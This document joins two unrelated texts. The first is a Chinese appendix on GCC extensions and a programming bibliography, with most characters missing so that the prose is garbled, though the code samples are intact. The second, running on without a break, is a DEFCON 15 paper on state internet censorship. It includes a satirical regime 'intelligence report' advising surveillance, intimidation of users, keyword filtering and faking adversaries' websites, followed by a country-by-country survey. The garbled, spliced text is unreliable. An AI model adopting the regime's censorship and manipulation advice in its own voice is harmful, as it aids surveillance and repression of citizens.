调的以进的
。的能 void。
A.7 分配内存的函数
内存的∗(以
新的内存新内存的程以将 malloc
以进的
∗内存或以上的同内存。内存我们
将的给的时内存。然能更的出
内存。的新的内存的同内存
。
__attribute__ ((malloc)) void * get_page (void)
{
int page_size;
page_size = getpagesize ();
if (page_size <= 0)
return NULL;
return malloc (page_size);
}
A.8 强制调用函数检查返回值
属性warn_unused_result 以示存或
件时能
__attribute__ ((warn_unused_result)) int foo
(void) { /* ... */ }
调的的时处理以程调
处理。 read() 的然
时warn_unused_result 属性。能
void。
A.9 将函数标记为 deprecated
deprecated 属性示调时
__attribute__ ((deprecated)) void foo (void) {
/* ... */ }
提程或时的。
A.10 将函数标记为 used
以的式调。将 used
以示程上
__attribute__ ((used)) void foo (void) { /* ...
*/ }
出相的出的。
写的调时属性。(
used 时时调时能将
。
A.11 将函数或参数标记为 unused
unused 属性示的或示
相的
void foo (long __attribute__ ((unused)) value)
{ /* ... */ }
属性 -W 或 -Wunused
的(件程或处理
真的。
A.12 将结构体进行打包(pack)
packed 属性示对或内存以能小的内存空间
存(内存属性的内存对的。属性
或时的。时
的。将的的小内存空间
(1)。
struct __attribute__ ((packed)) foo (void) {
... };
char 的 int 的
时将 int 的对 char 的 3
将 char 的内存。间
的以对进对。的
能的内存满相上的对。
A.13 增加变量的内存对齐量
以对进 GCC 程给的
小对。对进对时 ABI
的小对小的对。
beard_length进 32 的内存对(的对 32
进 4 对
int beard_length __attribute__ ((aligned (32)))
= 0;
的内存对能件的
内存对更写 C
对的时。存处理存的以
存时以能。 Linux 内。
小内存对以 GCC 将给的对
设的小内存对的。段
parrot_height 的内存对 GCC 以的
double
short parrot_height __attribute__ ((aligned))
= 5;
何内存对时间空间的上方式对的
更空间上的(以及的操作能更时
间以调处理内存的以处理内存。
工能的的内存对。 Linux
相小的的对。时 aligned 的
对设。的对 32
的能对 8 8 进对。
A.14 将全局变量置于寄存器中
GCC 程将的存将程的
内处存。 GCC 的存
。程的存的存 ebx
register int *foo asm (”ebx”);
程的存能(function-clobbered
的存能调时进存
能或操作的 ABI 作何的。
的存。的存(
的 ebx x86 的存。
时将存以的性能提。
的子。将存(virtual stack frame pointer的
存将的处。方的存
( x86 。存能
处理能程程。能设
能程存设。存的
的。
A.15 分支预测
GCC 程对式的进件
能真。相 GCC 以对进调以
件的性能。 GCC 的。
#define likely(x)	__builtin_expect (!!(x), 1)
#define unlikely(x)	__builtin_expect (!!(x), 0)
程以将式 likely() 或 unlikely() 以
式能真或能真。子示能真(
即能
int ret;
ret = close (fd);
if (unlikely (ret))
perror (”close”);
对的子示能真
const char *home;
home = getenv (”HOME”);
if (likely (home))
printf ("Your home directory is: %s\n", home);
else
fprintf (stderr, "Environment variable HOME not set!\n");
内程的。对
式进能式。晓
对式的( 99% 的真或的
将能真或能真。的
。
A.16 获取表达式的类型
GCC 提 typeof以给式的。上 typeof
sizeof() 的理相同。 x 的的
typeof (*x)
以的 y
typeof (*x) y[42];
typeof 写的以操作的
的即
#define max(a,b) ({           \
	typeof (a) _a = (a);  \
	typeof (b) _b = (b);  \
	_a > _b ? _a : _b;    \
})
A.17 获取类型的内存对齐量
GCC 提__alignof__ 给对的对。对
ABI 。的提的对
__alignof__ ABI 的对。小对
。 sizeof 相同
__alignof__(int)
上能 4 32 4
的进对的。。的对
相的小内存对的对。 aligned 属性
小内存对(的内存对
以__alignof__ 。
以
struct ship {
int year_built;
char canons;
int mast_height;
};
段
struct ship my_ship;
printf ("%d\n", __alignof__(my_ship.canons));
上面的代码会打印出 canons 的对齐量。由于 char 类型的对齐量是 1,这里的 __alignof__ 表达式将返回 1。
A.18 结构体中成员的偏移量
GCC 内以的的
。 offsetof() <stddef.h> ISO C 的。的
实实的操作。 GCC
的扩展更单能更
#define offsetof(type, member) __builtin_offsetof (type, member)
上调 type member 的
的( 0 。
struct rowboat {
char *boat_name;
unsigned int nr_oars;
short length;
};
实的的小以及的对
32 上对 rowboat boat_name、 nr_oars、 length 调 off-
setof()将 0 4 8。 Linux offsetof() GCC 的
程新。
A.19 获取函数返回地址
GCC 提以(或的调的
的
void * __builtin_return_address (unsigned int
level)
level 调(call chain的。
0 的 (f0) 的 1 的 (f0) 的 调
(f1) 的 2 的 调 f1 的 的 以
。 的 f0 内 将 f1 的 。
能 以 __builtin_return_address (
内 noinline 将 作 内 处 理。
__builtin_return_address 。以调或提。
以展调以实内、工(crash dump util-
ity、调。的。
0 能的。 0 时
的 0 调。
A.20 在 Case 中使用范围
GCC case 对单的的。的
的
case low ... high:
switch (val) {
case 1 ... 10:
/* ... */
break;
case 11 ... 20:
/* ... */
break;
default:
/* ... */
}
处理 ASCII 的 case 的时能
case ’A’ ... ’Z’:
空。空
的时。写
case 4 ... 8:
写
case 4...8:
A.21 void 和函数指针的算术操作
GCC void 的以以。
ISO C 的存 void 的小
小真的内。进 GCC 将
内的小 1 。将 a 1
a++;
/* a void */
-Wpointer-arith上扩展时 GCC
。
A.22 让代码变得更美观并有更好的移植性
我们__attribute__ 。更的
提的扩展处理进处理。调
以对我们扩展能的。处理
的。同时以 GCC 扩展更的性
GCC(时扩展空。
的将文件文件文件
#if __GNUC__ >= 3
# undef  inline
# define inline         inline __attribute__ ((always_inline))
# define __noinline     __attribute__ ((noinline))
# define __pure         __attribute__ ((pure))
# define __const        __attribute__ ((const))
# define __noreturn     __attribute__ ((noreturn))
# define __malloc       __attribute__ ((malloc))
# define __must_check   __attribute__ ((warn_unused_result))
# define __deprecated   __attribute__ ((deprecated))
# define __used         __attribute__ ((used))
# define __unused       __attribute__ ((unused))
# define __packed       __attribute__ ((packed))
# define __align(x)     __attribute__ ((aligned (x)))
# define __align_max    __attribute__ ((aligned))
# define likely(x)      __builtin_expect (!!(x), 1)
# define unlikely(x)    __builtin_expect (!!(x), 0)
#else
# define __noinline     /* no noinline */
# define __pure         /* no pure */
# define __const        /* no const */
# define __noreturn     /* no noreturn */
# define __malloc       /* no malloc */
# define __must_check   /* no warn_unused_result */
# define __deprecated   /* no deprecated */
# define __used         /* no used */
# define __unused       /* no unused */
# define __packed       /* no packed */
# define __align(x)     /* no aligned */
# define __align_max    /* no aligned_max */
# define likely(x)      (x)
# define unlikely(x)    (x)
#endif
以上的写方式将
__pure int foo (void) { /* ... */ }
GCC 上 pure 属性。的 GCC
将__pure 空(no-op。的我们以
属性同时上的。
处理更写更更的
附录 B
参考书目
程相的读, 进。读
时读作。们我相上的。
我。
的内设的读的 ( C )。
对的效 gdb Subversion(svn以及操作设
方的。的超出的 (的
程程)。内何我的。然单上
以自读。
B.1 C 语言程序设计的相关书籍
以程的 — C 。能写
C 以的(以的能方提。
以 K&R 读的。的
的 C 的单性。
The C Programming Language, 2nd ed. Brian W. Kernighan and Dennis M. Ritchie.
Prentice Hall, 1988. C 程设的作的作 C
。
C in a Nutshell. Peter Prinz and Tony Crawford. O Reilly Media, 2005.
的 C C 的。 C Pocket Reference. Peter Prinz and Ulla
Kirch-Prinz. Translated by Tony Crawford. O Reilly Media, 2002. 的
C 更新新的 ANSI C99 。 Expert C Programming. Peter
van der Linden. Prentice Hall, 1994. 对 C 的进
文作的。满
的我喜。 C Programming FAQs: Frequently Asked Questions, 2nd ed.
Steve Summit. Addison-Wesley, 1995.
超 400 C 程设的(。
FAQ C 小对的即
的 C 程。能绝对 C
上 ANSI C99(我
自的。的的
更新。
B.2 Linux 编程的相关书籍
的 Linux 程的相
的( IPC以及 pthreads Linux 程工(CVS GNU
Make以及 Subversion。
Unix Network Programming, Volume 1: The Sockets Networking API, 3rd ed. W.
Rich- ard Stevens et al. Addison-Wesley, 2003. API 的绝对
对 Linux 的更新 IPv6。
UNIX Network Programming, Volume 2: Interprocess Communications, 2nd ed. W.
Richard Stevens. Prentice Hall, 1998. 进程间(IPC的绝。
PThreads Programming: A POSIX Standard for Better Multiprocessing. Bradford
Nichols et al. O Reilly Media, 1996. POSIX 程 API—pthreads 的。
Managing Projects with GNU Make, 3rd ed. Robert Mecklenburg. O Reilly Me-
dia, 2004. GNU Make—Linux 上件的工的绝。
Essential CVS, 2nd ed.
Jennifer Versperman.
O Reilly Media, 2006.
CVS—Unix 上理的工的绝。
Version Control with Subversion. Ben Collins-Sussman et al. O Reilly Media,
2004. Subversion—Unix 上理的工的
的 Subversion 的作。
GDB Pocket Reference.
Arnold Robbins.
O Reilly Media, 2005.
gdb—Linux 调的。
Linux in a Nutshell, 5th ed. Ellen Siever et al. O Reilly Media, 2005. 对 Linux
内的 Linux 的工。
B.3 Linux 内核的相关书籍
出的及 Linux 内方的。我们理对
进。内提对空间的调。内
的性上的进时出。 Linux 内
同时。
Linux Kernel Development, 2nd ed. Robert Love. Novell Press, 2005.
给 Linux 内设实的程读(然我
提及我上的。作 API 同时对 Linux 内
的以及的的。 Linux Device Drivers, 3rd ed.
Jonathan Corbet et al. O Reilly Media, 2005. 写 Linux 内设备
程方的绝同时的 API 。对的设备
的以程 ( Linux 内的
程)。我 Linux 内方的备。
B.4 操作系统设计的相关书籍
对 Linux 的理上操作设实。
我调的对进程上的的
。
Operating Systems, 3rd ed. Harvey Deitel et al. Prentice Hall, 2003. 操作设
理方的作同时将理实的。操作
设我的操作的展读。
UNIX Systems for Modern Architectures: Symmetric Multiprocessing and Caching
for Kernel Programming. Curt Schimmel. Addison-Wesley, 1994.
程的的性存提
绝的。
Greetz from Room 101
Kenneth Geers
www.chiefofstation.com
DEFCON 15
Contents: A Cyber War in Three Parts
PREFACE...............................................................................................................................................................................3
1984....................................................................................................................................................................................3
2007....................................................................................................................................................................................3
CHIEF OF STATION INTELLIGENCE REPORT .............................................................................................................4
PALACE STRATEGY.................................................................................................................................................................4
CYBER OFFICE TACTICS.......................................................................................................................................................4
NATIONAL SECURITY AND TRAFFIC ANALYSIS....................................................................................................................5
THE CORPORATE CONNECTION...............................................................................................................................................6
OUTLOOK ................................................................................................................................................................................6
EXODUS NON-GOVERNMENTAL ORGANIZATION SURVEY ..................................................................................8
THE MOST REPRESSIVE GOVERNMENTS IN CYBERSPACE......................................................................................................8
# 10 ZIMBABWE....................................................................................................................................................................8
# 09 IRAN..............................................................................................................................................................................9
# 08 SAUDI ARABIA ............................................................................................................................................................10
# 07 ERITREA......................................................................................................................................................................11
# 06 BELARUS.....................................................................................................................................................................12
# 05 BURMA........................................................................................................................................................................13
# 04 CUBA ..........................................................................................................................................................................14
# 03 CHINA .........................................................................................................................................................................15
# 02 TURKMENISTAN ..........................................................................................................................................................16
# 01 NORTH KOREA............................................................................................................................................................17
NOTES FROM THE UNDERGROUND ...............................................................................................................................19
CYBER CONTROL.................................................................................................................................................................19
CYBER RESISTANCE..........................................................................................................................................................19
RESISTANCE TOOLS............................................................................................................................................................20
THE FUTURE.......................................................................................................................................................................21
INFORMANTS...................................................................................................................................................................22
Preface
1984
Have you ever embellished a resume, or lied when you told a hot date that you were in love with
her? Guess what: you have engaged in Information Warfare. And governments are just like you
and me … only the stakes are usually much higher.
In the novel Nineteen Eighty-Four, George Orwell imagined a government that waged full-time
Information Warfare against its own people. There is a Ministry of Truth, which is in charge of
lies. Thought Police punished something called thoughtcrime, and used technology in the form of
two-way telescreens to keep an eye on everyone. Room 101, a torture chamber in the Ministry of
Love, awaits those who dare to challenge the system. There, Big Brother tries to reprogram
wayward souls. Citizen Winston Smith worked in the Ministry of Truth, rewriting history in an
attempt to match current government positions.
Truth is always stranger than fiction: there are in fact many countries on Earth today where the
only media available carry stories that are carefully crafted by government censors, and where
the government's point of view will invariably be the right one, no matter how many times it
changes. At one point in 1984, citizens are told that their country, Oceania, had always been at
war with its theretofore ally, Eastasia. Life paused for a moment, as everyone absorbed the new
reality, and then it returned to normal.
2007
Fast-forward to DEFCON 15. The indisputable power of the Internet is growing by the day.
Students, politicians, covert operatives and televangelists all agree. To military men, the Internet
is also a weapon; in a soldier's parlance, it can now kill people and break things. Privacy
advocates, law enforcement, and freedom of information warriors are all working on enormously
important Internet projects, even if they are doing so for quite different purposes.
In times past, the first thing a coup plotter had to do, just before dawn, was to seize the national
radio station. Printing presses – since they operate so much slower than radio waves – could wait
until the afternoon. The Internet has changed the rules of the game. Anyone who owns a
personal computer and a connection to the Internet has both a printing press and a radio
transmitter in their own home, and the entire world is potentially their audience. In places where
there has traditionally been only government-run radio and newspaper, the Internet is not only
the final frontier in the information space, but it can also represent a grave threat to the
continued power of a ruling government…
Who Controls the Past Controls the Future
Who Controls the Present Controls the Past
Top Sekret
Chief of Station Intelligence Report
Palace Strategy
Rule #1: Never trust the Internet. It is dynamic, chaotic, and
inherently unpredictable. The people will likely use access to the
Internet to try and bring your government down. At the Cyber Office,
our job will be to pare the Internet down to a manageable size.
Always remember that no matter what activist groups may say, there are
good reasons to filter Internet content. There is evil among us, and
it must be policed. Publicly, you can cite culture, religion, and
common sense. The two-edged sword here is that Law Enforcement tools
can be used against both common criminals and political adversaries.
From a political point of view, the Internet is the best way to
deliver political messages efficiently and directly to the people. At
the same time, software tools allow us to deny your rivals that same
opportunity. To maximize our leverage, we must
ensure that all telecommunications are controlled by the state. If we
can do that, surveillance and even information manipulation are only a
mouse click away.
One final point. Cyber attacks are extremely hard to prove.
Evidence, especially for the common man, is scarce. If a reporter
asks, tell them that you do not even own a computer. Other
governments may occasionally ask you a question about computers, but
in reality they rarely let human rights interfere with their business
interests.
Cyber Office Tactics
The Internet itself is a Trojan horse. Now that it is allowed in our
country, there will be surprises. Modern data-hiding techniques mean
that even your official portrait, on our national homepage, could
carry a secret message within it that describes the details of a
planned coup d'état, and we would not know it. Computer networks will
never be air-tight. Hostile network operations are inevitable from
both internal users and from the farthest corners of the planet.
If you continue to allow the Internet into this country, we are going
to need better equipment and more expertise. Some of the choices we
need to make for the country are the exact same choices that are faced
by home computer users: do we buy shrink-wrapped software or use
freeware? Do we want it highly configurable or point-and-click?
Reportedly, Burma, Belarus, Zimbabwe and Cuba have all purchased
Internet surveillance systems from the People's Republic of China
(PRC).
Most of the traditional security skills that we have hired in the past
are simply inadequate to control cyberspace. New recruits must either
possess or quickly acquire cyber expertise.
The first thing we will target is unchecked network connections. Here
are the new rules:
• All Internet accounts must be officially registered with state officials
• All Internet activity must be directly attributable to individual accounts
• Users may not share or sell their connections
• Users may not encrypt their communications
• We will encourage self-censorship through physical and virtual intimidation
• We will manage access to international news sites, especially in English
• We will regulate and tax local language sites to a very high degree
In 1991, I crossed the border from Tanzania to Malawi. My bags were
searched, and all foreign media was confiscated. If you really want
to own your information space, this type of discipline is necessary.
World history must be your history, and the future must be your
future.
Finally, we are in touch with several regimes that have common cyber
concerns. They have signaled that they are willing to share their
work with us on tactics and lessons learned.
National Security and Traffic Analysis
In theory, it is possible to read, delete, and/or modify information
“packets” based on both address and content. When our network
administrators discover a violation of the law, they simply call the
police, and after cross-checking telecommunications records, they
knock on the perpetrator’s door.
The two basic information-filtering strategies you should be aware of
are blacklisting and whitelisting. Blacklisting means removing from
the public domain any material content that is objectively wrong, such
as the words “government” and “corrupt” appearing in the same
sentence. The problem with blacklisting is that someone will find a
way to fool the system – wittingly or unwittingly – by writing
something like “our govrment is korrupt”. Therefore, whitelisting is
a more attractive way to control the information flow. The premise
here is that absolutely nothing is allowed, except that which has been
pre-approved by the state. We can give the people just enough
politics, weather, sport, and porn, and we are done.
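The weakness of blacklisting described above can be sketched in a few lines of code. This is a hypothetical illustration only (the word list and matching rule are invented, not taken from any real filtering product): a naive filter that blocks text when every blacklisted word appears, and which the deliberate misspellings quoted above slip right past.

```python
# Hypothetical sketch of a naive blacklist filter. The word list and the
# "all words present" rule are illustrative assumptions, not a real product.
BLACKLIST = {"government", "corrupt"}

def is_blocked(text: str) -> bool:
    """Block a message only if every blacklisted word appears in it."""
    words = set(text.lower().split())
    return BLACKLIST.issubset(words)

print(is_blocked("our government is corrupt"))  # True: exact keywords caught
print(is_blocked("our govrment is korrupt"))    # False: misspellings evade it
```

Exact keyword matches are trivially caught, while the misspelled variant scores as clean, which is precisely why the report's author turns to whitelisting instead.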
Freedom loves pornography. In fact, there are interesting
relationships here for us to exploit. Some countries believe that
pornography is absolutely wrong and must be prohibited at all cost.
And they are quite open about this. That gives governments like ours
legitimacy in censorship. In practice, pornography is possible to
censor because sex words make great computer keywords. They are
conveniently marked “vulgar” in the dictionary. Our intention,
however, is not to block porn per se, but to give our citizens just
enough to keep them happy.
Politics are far more difficult for computers to analyze, so there is
no choice for the Cyber Office but to be ruthless. The challenge for
computers is completely different, as word recognition is not enough.
Artificial intelligence is not smart enough to place the words it sees
into context. Computers do not understand the nuances of politics.
The author's intention may have been positive feedback, constructive
criticism, humor, irony, sarcasm, or satire. Most humans don’t even
know the difference. Political censorship requires an army of subject
matter experts fluent in the local history, language, and culture.
This was difficult in ancient Egypt; in the Internet era, it is
impossible.
In the future, you will surely face the so-called Despot's Challenge,
which refers to the problem of both over- and under-censoring
citizens’ lives. In general, any censorship at all usually leads to
over-censorship. In censored countries, for example, citizens cannot
usually find a map of Middlesex County, and they have trouble finding
a recipe for marinated chicken breasts. Censored items should ideally
be double-checked by real people. Unfortunately, that is not always
practical. What we know for sure is that giving the people too much
information is always dangerous. However, if they have too little
information to work with, they may become quickly bored and restless.
The Corporate Connection
Strict government control and network packet analysis are not a match
made in heaven. Traditional methods of control, such as muscles and
truncheons, are of little use in cyberspace. Fortunately, there are
many software companies that make products we can buy off-the-shelf:
8e6, CensorNet, Content Keeper, Cyber Patrol, Cyber Sentinel,
DansGuardian, Fortinet, Internet Sheriff, K9, N2H2, Naomi, Net Nanny,
SmartFilter, squidGuard, Surf Control, We-Blocker, Websense, and more.
These products can be configured for either a schoolroom or a nation-
state. Default filters include common vices like pornography and
gambling. These companies are often the focus of privacy advocates'
criticism, but from a free market standpoint, there is a logical
defense: filtering software is politically neutral.
A good example of such software is the open source tool DansGuardian.
It is advertised as sophisticated, free Internet surveillance, and “a
cleaner, safer, place for you and your children”. Its settings can be
configured from “unobstructive” to “draconian”. With this software,
the Cyber Office can filter by technical specifications such as URL,
IP, domain, user, content, file extension, and POST. Advanced
features include PICS labeling, MIME type, regular expressions, https,
adverts, compressed HTML, intelligent algorithm matches for phrases in
mixed HTML/whitespace, and phrase-weighting, which is intended to
reduce over- and under-blocking. Furthermore, there is a whitelist
mode, and stealth mode, where access is granted to the user but an
alert is nonetheless sent to administrators.
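The phrase-weighting feature mentioned above can be illustrated with a small sketch. This is not DansGuardian's actual implementation; the phrases, weights, and threshold below are invented for illustration. The idea is that matched phrases contribute positive or negative scores, and a page is blocked only when the running total crosses a threshold, which is how weighting reduces both over- and under-blocking compared to single-keyword matching.

```python
# Illustrative sketch of phrase-weighting in a DansGuardian-style filter.
# The phrase list, weights, and threshold are hypothetical examples.
PHRASE_WEIGHTS = {
    "free press": 40,        # suspicious in this invented policy
    "opposition party": 60,  # strongly suspicious
    "weather forecast": -20, # benign context lowers the score
}
THRESHOLD = 80  # block only when the combined score reaches this value

def page_score(page_text: str) -> int:
    """Sum the weights of every configured phrase found in the page."""
    text = page_text.lower()
    return sum(w for phrase, w in PHRASE_WEIGHTS.items() if phrase in text)

def is_blocked(page_text: str) -> bool:
    return page_score(page_text) >= THRESHOLD

print(is_blocked("Free press and the opposition party meet"))  # True (40+60)
print(is_blocked("Weather forecast from the free press"))      # False (40-20)
```

A single phrase in isolation stays under the threshold, while a combination of suspicious phrases tips the page into being blocked; benign phrases can pull the score back down.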
Outlook
The Internet itself is a Trojan horse that we cannot trust. The Cyber
Office’s primary goals will be to have visibility on all network
traffic within the country, and to ensure that all political messages
come only from you. At the same time, we will deny your adversaries
the same opportunities. All citizens will have an Internet address
that can be associated with them personally. Because we own all
national telecommunications, we therefore own the entire
infrastructure, and can decide precisely who sees what information.
And censoring the Internet is only the beginning. In the future, it
will even be possible to manipulate the so-called “truth” in
cyberspace. We intend to copy the websites of our adversaries, change
the information they contain, and repost them in our country. And we
can run cyber sting operations that are designed solely to bring
cockroaches out of the woodwork. The average user knows very little
about these matters, and he will either have to trust the information
he sees, or not to trust it. Either way, we win.
Exodus Non-Governmental Organization Survey
The Most Repressive Governments in Cyberspace
This Top Ten list has been compiled using information and analysis provided by, among others,
Reporters Without Borders (www.rsf.org/), the OpenNet Initiative (opennet.net/), Freedom House
(www.freedomhouse.org/), Electronic Frontier Foundation (www.eff.org/), ITU Digital Access
Index (www.itu.int), Central Intelligence Agency (www.cia.gov), and subjective analysis of
current events. By way of example, the RSF website states that the “[a]ssessment of the situation
in each country (good, middling, difficult, serious) is based on murders, imprisonment or
harassment of cyber-dissidents or journalists, censorship of news sites, existence of independent
news sites, existence of independent ISPs and deliberately high connection charges.” The
evaluation of human rights and/or Big Brother-style cyber surveillance across the planet will be a
never-ending task. Further, the well of ignorance and misunderstanding will always be too deep
for this to be a conclusive report. Therefore, we are constantly on the lookout for corrections to
errors in both fact and judgment. That said, here are the current Exodus Top Ten:
# 10 Zimbabwe
Telecommunications in Zim were among the best in Africa, but like everything else in the
country – as the government desperately clings to power – have gone downhill precipitously.
Internet connection is available in Harare and is planned for all major towns and for some of the
smaller ones. There are two international digital gateway exchanges, in Harare and in Gweru.
One of the primary government strategies appears to be to own the gateways leading into and out
of the country. The government has purchased an Internet monitoring system from China, and is
working toward a monopoly solution for the state-owned Tel*One telecoms firm. The goal here
is two-fold: to force all communications through one pipe, for the sake of total visibility on
internal and external traffic, and to increase the cash flow into quasi-government coffers.
Legislation, including the Interception of Communications Bill (ICB), forces ISPs, some of
which have threatened to shut down in protest, to spend their Zim dollars on hardware and
software to support the government's monitoring programs. In country, there are no court
challenges to government intercepts allowed.
In October, 2006, it was reported that President Robert Mugabe's Central Intelligence
Organisation (CIO) met with the purpose of infiltrating Zim Internet service providers (ISP), in
order to “flush out” journalists who were using the Internet to feed “negative information” about
the government to international media. According to the report, police were informed that they
should pose as cyber café attendants and Web surfers. However, they were also told that it
would be necessary for them to undergo “some computer training” first.
A police spokesman announced that the government would do “all it can” to prevent citizens
from writing “falsehoods against the government.” Jail terms for such offenses are up to 20 years
in length.
# 09 Iran
Life on the Iranian Net is already vibrant, and growing at a dizzying speed. There were 1M
Internet users in 2001, 10M today, and there could be 25M in 2009. The expansion has been
phenomenal, especially regarding the posting of Farsi-language material online. Cyber cafés and
the use of broadband are rising sharply.
While Internet surveillance in Iran is reported to be among the most sophisticated in the world,
the country’s political culture is also the most advanced in our Top Ten list, and many of the
strict rules regarding Internet usage do not appear to be routinely enforced. Cyber café
monitoring is reported to amount to only the occasional inspector, and while journalists are required to be
free of “moral corruption” – and anonymous publications of any sort are officially prohibited –
some news media are openly critical of the government, and the Web is the “most trusted” news
source.
Former president Mohammad Khatami stated in an interview that the Iranian government
tries to have the “minimum necessary” control over the Internet. He explained that while Muslim
values would be emphasized within Iranian network space, only sites that are “truly insulting”
towards religious values would be censored. He argued that political sites which oppose official
Iranian government viewpoints were available to the public.
According to the OpenNet Initiative, however, about one-third of all websites are blocked by the
Iranian government. Among the frequently blocked sites were politics (Voice of America,
www.voanews.com), pornography, translation, blogging (www.movabletype.org), and
anonymizing software. Similar content is more likely to be blocked if in Farsi. Commercial
software known to have been used in Iran is SmartFilter by Secure Computing.
Furthermore, it is technically illegal to access “non-Islamic” Internet sites, and such offenses can
elicit severe punishments. Media receive a list of banned subjects each week, ISPs must install
mechanisms to filter Web and e-mail content, and there is a dedicated press court. Iranian
publications are not to conflict with government goals. Since 2000, 110 news outlets are reported
to have been closed, and over 40 journalists detained.
While it has been reported that Iran has engaged in widespread censorship, it has also been
alleged that the government is attempting to control user behavior to a far lesser degree. In fact,
Iranian Internet users are Net savvy. Since the year 2000, Iranian citizens have participated in a
remarkable amount of mainstream and alternative blogging. Even President Mahmud
Ahmadinejad has one: http://www.ahmadinejad.ir/. On the downside, at least one death threat
was lodged against blogger Hoder (Hossein Derakhshan), and hard-line newspaper Kayhan
accused the CIA of using Iranian blogs to undermine Iranian government.
On the bright side, there is significant movement inside the country to limit the power of the
government in cyberspace. In August 2004, a number of reformist news sites were blocked, but
the content was quickly mirrored on other domains. In another case, an anonymous system
administrator posted an alleged official blacklist of banned sites. Even some reformist Iranian
legislators have openly complained about censorship, even online. One current trend among the
population is a rise in the use of Really Simple Syndication (RSS) feeds to evade blocking.
# 08 Saudi Arabia
The telecommunications system in Saudi is first-rate, encompassing extensive microwave radio
relay, coaxial cable, and submarine fiber-optic cable systems. Like Iran, Saudi Arabia boasts a
highly educated citizenry; they have been surfing the Internet since 1994.
Government authorities in Riyadh have articulated that they seek to create a “moral” Internet
through the elimination of its “negative” aspects. The primary strategy has been to require ISPs
to conform to Muslim values, traditions, and culture in order to obtain an operating license.
Upstream, the King Abdul-Aziz City for Science and Technology (KACST) represents a single,
centralized international connection from Saudi Arabia to the outside world. KACST is a
national-level proxy server that uses a complicated system of cached sites, banned URLs, and
cyber-triage to keep an eye on inbound and outbound traffic. Encryption is forbidden. Still, Saudi
officials have admitted that in the race between technology and bureaucracy, they struggle to
keep up. Citizens commonly use international telephone and satellite access to foreign ISPs.
To the Saudi Web surfer, censorship appears in the form of a pop-up window, warning that the
content they seek has been disallowed (in Arabic and in English) and that their request for said
information was logged by government servers (in Arabic only). Officials insist that they are
reasonable when it comes to blocking Internet sites. Included in the range of information that
OpenNet Initiative researchers have seen withheld are religion, health, education, humor,
entertainment, general reference works, computer hacking, and political activism. In Saudi
Arabia, pornography is the first thing to go. Officials contend that “all” major porn sites are
identified and blocked.
However, there is evidence that censorship is based on a strong mix of morality and politics. As
in the book 1984, “unofficial” histories of Saudi Arabia are banned. Officially, political sites
are not supposed to be blocked, but a well-known cat-and-mouse game between Riyadh and an
anti-government group called MIRA tells otherwise. Initially, the government tried to block the
site by IP. The site’s owners were forced into a marathon contest of hide-and-seek via IP hopping
and port randomization, while sending constantly changing addresses to its patrons by email. The
challenge was to make its readership aware of the new Web location before the authorities could
find it. On average, MIRA was able to stay ahead of the government for about a week at a time.
Web application logins reportedly made it more difficult for the government to see where its
citizens were going. Evidently, officials decided that the effort was too much work, and finally
gave up.
In a Web filtering system like this, which uses a primitive type of Artificial Intelligence (AI) to
evaluate Internet sites it has never seen before, the total number or percentage of banned sites and
information cannot easily be known, but easily runs into the millions. At its most basic level,
keywords are used to recognize and block certain types of information. In order to prevent
unnecessary over-blocking, one of the unique aspects of the Saudi system is that citizens can fill
out a Blacklist Removal form (there are also Blacklist Addition forms). Thus, if an individual
thinks that certain information is being withheld from them in error, they have an efficient
appeals process. KACST management claim that they receive over 500 forms every day.
# 07 Eritrea
Oral traditions in Africa are still strong, have a historical resonance, and are widely used to foster
national solidarity. Radio and clandestine radio stations in the Horn of Africa play a vital role in
both government and anti-government forces. Recently, one sole Sudanese transmitter offered
service to three separate anti-Eritrean radio stations.
Political battles in Eritrea are now shifting from the radio spectrum to cyberspace. Local
factions, as they appeal to the hearts, minds, and wallets of their supporters, are able to reach both
regional and international audiences via the Internet. Sites such as Pan-African News
(www.africanews.org) and Eritrea Online (www.primenet.com/ephrem) feature images from the
frontlines, analysis, and everyone from African leaders to humanitarian groups making daily
statements in support of their causes.
In November 2000, Eritrea became the last African country to go online. Four ISPs shared one
national pipe and 512 kilobits per second. By 2005, the number of Internet users had grown to a
reported 70,000. However, since few Eritreans are wealthy enough to own a computer, ISPs
typically offer walk-in use. Initially, the national Telecommunications Service of Eritrea (TSE)
announced that Internet access in the country would be unimpeded, and opposition and Ethiopian
websites were accessible.
Since 2001, however, human rights in Eritrea have steadily gone downhill. There are no foreign
correspondents in the country, and prison inmates have been confined to cells consisting of cargo
containers. No International Committee of the Red Cross (ICRC) visits have been allowed. In
2004, all cyber cafés, previously only under government “supervision”, were physically
transferred to “educational and research” centers. The reason given was “pornography”, but
international diplomats were highly skeptical of the move.
Since that time, some ruling party members decided to post an announcement of a new political
party to the Web, but the posting was made from outside Eritrea.
# 06 Belarus
Life in Minsk has not changed much since the Cold War. The Presidential Administration
directly controls all information flowing through the printing press, radio, television, and now
cyberspace. Independent stations typically avoid news programming altogether, and even
Russian TV is heavily censored.
The Beltelecom state-owned monopoly is the sole provider of telephone and Internet
connectivity, although about 30 ISPs connect through Beltelecom. The only reported
independent link is through the academic network BasNet. Beltelecom has been accused of
“persecution by permit” and of requiring a demonstration of political loyalty for its services. At
least one Belarusian journalist is alleged to have “disappeared”. Strict government controls are
enforced on all telecommunications technologies. For example, transceiver satellite antennas and
IP telephony are both prohibited.
As in Zimbabwe, the Beltelecom monopoly status is intended not only for government oversight,
but also for monetary gain. It is the primary source of revenue for the Ministry of
Communications (MIC).
The State Center for Information Security (GCBI), in charge of domestic signals intelligence
(SIGINT), controls the .by Top Level Domain (TLD), and thus manages both DNS and website
access in general. Formerly part of the Belarusian KGB, GCBI also reports directly to the
President. Department “K” (for Cyber), within the Ministry of Interior, has the lead in pursuing
cyber crime. Internet surveillance mechanisms were reportedly bought from China. A common
media crime in Belarus is defaming the “honor and dignity” of state officials.
Belarus has a long history of Internet-based political battles to examine. In each of the following
years, 2001, 2003, 2004, and 2005, Internet access problems were experienced by websites
critical of the Belarusian president, state referenda, and elections. According to the government,
the problems were due simply to access overload, but the opposition claimed that no one was able
to get to the sites. One of the affected sites was characterized by the Ministry of Foreign Affairs
as “political pornography”.
The most significant cyber showdown took place during the March 2006 Belarusian presidential
elections. The opposition specifically tried to use its youth and computer savvy to organize in
cyberspace. The sitting government attempted the same, but because its supporters primarily
consisted of the rural and elderly, its efforts were uphill at best.
Election day provided the world a case study in modern-day cyber politics. As Belarusians went
to the polls, up to 37 opposition media websites were inaccessible from Beltelecom. “Odd” DNS
errors were reported, and the presidential challenger’s website was diagnosed as clinically
“dead”. One week after President Lukashenka won the election by a wide margin, as anti-
government demonstrators clashed with riot police, the Internet was inaccessible from Minsk
